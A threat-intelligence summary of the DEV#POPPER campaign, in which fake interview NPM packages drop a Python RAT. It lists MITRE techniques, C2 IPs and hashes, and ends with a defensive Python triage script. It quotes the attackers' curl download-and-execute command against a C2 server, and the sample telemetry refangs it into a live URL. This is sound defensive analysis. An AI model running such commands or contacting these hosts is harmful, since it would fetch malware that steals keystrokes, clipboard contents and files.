Analysis of DEV#POPPER: New Attack Campaign Targeting Software Developers Likely Associated With North Korean Threat Actors

Keypoints

  • Attackers lure software developers via fake interview zip archives hosted on GitHub that contain a seemingly legitimate NPM package.
  • The NPM package hides a heavily obfuscated JavaScript (imageDetails.js) that runs under node.exe to download and extract a secondary archive from an attacker C2.
  • Downloaded archive is extracted to the user’s temp folder and executed with python.exe by running a hidden extensionless Python file (.npl).
  • The .npl file decodes a large base64/XOR payload and launches a second extensionless Python script (pay) which contacts C2 and executes further code.
  • The pay script first collects system and network metadata and POSTs it to C2, then executes a larger RAT component providing persistent TCP C2, filesystem discovery, remote command execution, FTP exfiltration, clipboard capture and keystroke logging.
  • Identified infrastructure includes C2 IPs 147.124.214[.]131 and 173.211.106[.]101 and several analyzed file hashes for sports_platform_app-main.zip, imageDetails.js, .npl and pay.

MITRE Techniques

  • [T1105] Ingress Tool Transfer – Downloaded next-stage archive via curl from attacker server (‘curl -lo “C:\Users\[REDACTED]\AppData\Local\Temp\p.zi” “hxxp://147.124.214[.]131:1244/pdown”’)
  • [T1059.006] Command and Scripting Interpreter: Python – Executed hidden extensionless Python files using python.exe (‘Run python.exe and execute the hidden file which was just extracted “.npl”’)
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Used cmd.exe to run download and extraction commands (‘cmd.exe /d /s /c “curl -lo …”’ and ‘cmd.exe /d /s /c “”c:\users\[REDACTED]\.pyp\python.exe” “c:\users\[REDACTED]\.npl”’)
  • [T1027.010] Obfuscated Files or Information: Command Obfuscation – JavaScript was heavily obfuscated with base64 and variable substitutions to hide behavior (‘The [script] is obfuscated using several layers of obfuscation including base64 and variable substitutions.’)
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP) – C2 communication and data exfiltration performed over HTTP POSTs to hard-coded C2 (‘The decoded result contains … a hard-coded C2 server: hxxp://147.124.214[.]131:1244’ and ‘transmitted in a JSON-like format back to the attacker’s C2 server by issuing a carefully crafted HTTP POST request.’)
  • [T1560] Archive Collected Data – Script archives and filters files for collection prior to exfiltration (collection and tar/extract behavior observed) (‘Using the tar command, extract zip file into the user’s temp directory’)
  • [T1041] Exfiltration Over C2 Channel – Files and collected data are sent back to attacker-controlled servers and FTP for exfiltration (‘The Python script then calls and executes another Python script … sends this data to a remote server’ and ‘the Python script is able to send files to a remote FTP server’)
  • [T1033] System Owner/User Discovery – Gathers hostname, username and generates a UUID from MAC and username to identify infected host (‘Operating system type … Hostname … Username of the logged-in user … uuid generated by hashing the MAC address and username’)
  • [T1056.001] Input Capture: Keylogging – Implements keystroke logging capabilities to capture user input (‘The script includes capabilities to monitor and exfiltrate clipboard contents and keystrokes.’)
  • [T1115] Clipboard Data – Captures and exfiltrates clipboard contents (‘The script includes capabilities to monitor and exfiltrate clipboard contents and keystrokes.’)
  • [T1070.004] Indicator Removal on Host: File Deletion – Observed repository removal and staging cleanup tactics (report notes repositories deleted and recommends monitoring for file deletion) (‘At the time of publication, the attackers’ GitHub repositories we analyze below have already been deleted.’)

Indicators of Compromise

  • [IP Address] C2 infrastructure – 147.124.214[.]131, 173.211.106[.]101
  • [File Name] Malicious artifacts delivered in archive – sports_platform_app-main.zip, imageDetails.js, and extensionless files .npl and pay
  • [File Hash – SHA256] Analyzed payloads – 45c991529a421104f2edf03d92e01d95774bf54325f9107dd4139505912a0c1e (sports_platform_app-main.zip), 33617F0AC01A0F7FA5F64BD8EDEF737F678C44E677E4A2FB23C6B8A3BCD39FA2 (imageDetails.js), and two further hashes (for .npl and pay) given in the full report
  • [URL/Host] Download endpoint observed in commands – hxxp://147.124.214[.]131:1244/pdown (used with curl to fetch p.zip)

Attack flow (technical procedure): The initial delivery is a ZIP containing a plausible NPM project that includes a Backend/imageDetails.js file with a very large, multi-layer obfuscated JavaScript payload. When a developer runs the package, node.exe executes the obfuscated script, which decodes embedded payloads and issues OS commands to fetch a secondary archive from the attacker server (curl to hxxp://147.124.214[.]131:1244/pdown), extracts it to the user’s temp folder using tar, and launches a hidden Python payload.

The extracted Python chain uses extensionless, dot-prefixed files (.npl, then pay). The .npl file holds a large base64/XOR-encoded blob that is decoded in memory and passed to exec() to run additional Python code. The decoded .npl points to the hard-coded C2 (hxxp://147.124.214[.]131:1244) and invokes the next-stage script stored under the user profile (e.g., C:\Users\[REDACTED]\.n2\pay).

The pay script decodes two embedded code strings: the first gathers host telemetry (OS type, hostname, OS version, username, and a UUID derived from MAC+username) and sends it via an HTTP POST to C2; the second implements RAT capabilities including persistent TCP connections with JSON framing, filesystem traversal and filtered file collection, remote command execution, FTP-based file upload/exfiltration, clipboard capture and keystroke logging. Detection should focus on script execution in user-writable locations (notably %APPDATA%), unusual python.exe process creation, and outbound connections to the listed C2 IPs.
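As an added example (not code from the Securonix report), the following Python triage routine turns the detection guidance above into checks over constructed process-creation and network records modelled on the reported chain: node.exe spawning a curl download, python.exe launched from a dot-directory in the user profile with a hidden extensionless script, and outbound connections to the listed C2 addresses. The event field names, the user name `dev` and the sample events are assumptions.

```python
import re

# Defanged C2 addresses as listed in the report; refanged before matching raw logs.
C2_IPS_DEFANGED = ["147.124.214[.]131", "173.211.106[.]101"]
C2_IPS = {ip.replace("[.]", ".") for ip in C2_IPS_DEFANGED}

# python.exe handed a dot-prefixed, extensionless file directly under a user profile (e.g. .npl)
HIDDEN_SCRIPT = re.compile(
    r'python(?:\.exe)?"?\s+"?[A-Za-z]:\\Users\\[^\\"]+\\\.[A-Za-z0-9_]+"*(?:\s|$)', re.IGNORECASE)
# Interpreter image living under %APPDATA% or a dot-directory in the user profile
USER_WRITABLE = re.compile(r'^[A-Za-z]:\\Users\\[^\\]+\\(?:AppData\\|\.)', re.IGNORECASE)

def triage_event(ev: dict) -> list:
    """Return the DEV#POPPER-style findings raised by one telemetry record (assumed schema)."""
    hits = []
    if ev["type"] == "process":
        cmd, image = ev["cmdline"], ev["image"]
        if ev["parent"].lower() == "node.exe" and "curl" in cmd.lower():
            hits.append("node.exe spawning a curl download (T1105)")
        if any(ip in cmd for ip in C2_IPS):
            hits.append("known C2 address in command line")
        if image.lower().endswith("python.exe") and HIDDEN_SCRIPT.search(cmd):
            hits.append("python.exe executing hidden extensionless script (T1059.006)")
        if USER_WRITABLE.match(image):
            hits.append("interpreter launched from user-writable path")
    elif ev["type"] == "network":
        if ev["dest_ip"] in C2_IPS:
            hits.append("outbound connection to known C2 IP (T1071.001)")
    return hits

# Constructed sample telemetry modelled on the reported chain; not real log data.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "node.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /d /s /c "curl -lo "C:\Users\dev\AppData\Local\Temp\p.zi" "http://147.124.214.131:1244/pdown""'},
    {"type": "process", "parent": "cmd.exe", "image": r"C:\Users\dev\.pyp\python.exe",
     "cmdline": r'"C:\Users\dev\.pyp\python.exe" "C:\Users\dev\.npl"'},
    {"type": "process", "parent": "explorer.exe", "image": r"C:\Python312\python.exe",
     "cmdline": r'python.exe C:\projects\app\manage.py runserver'},
    {"type": "network", "image": r"C:\Users\dev\.pyp\python.exe", "dest_ip": "173.211.106.101", "dest_port": 1244},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dest_ip": "140.82.112.3", "dest_port": 443},
]

def triage(events: list) -> list:
    """Return (index, findings) for every event that raised at least one finding."""
    return [(i, triage_event(ev)) for i, ev in enumerate(events) if triage_event(ev)]

if __name__ == "__main__":
    for i, findings in triage(SAMPLE_EVENTS):
        print(f"event {i}: " + "; ".join(findings))
```

The IP match is exact-string and the path checks are regex-based, so adapt the field names and the user-profile pattern to your own EDR or Sysmon schema before deploying.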

Read more: https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/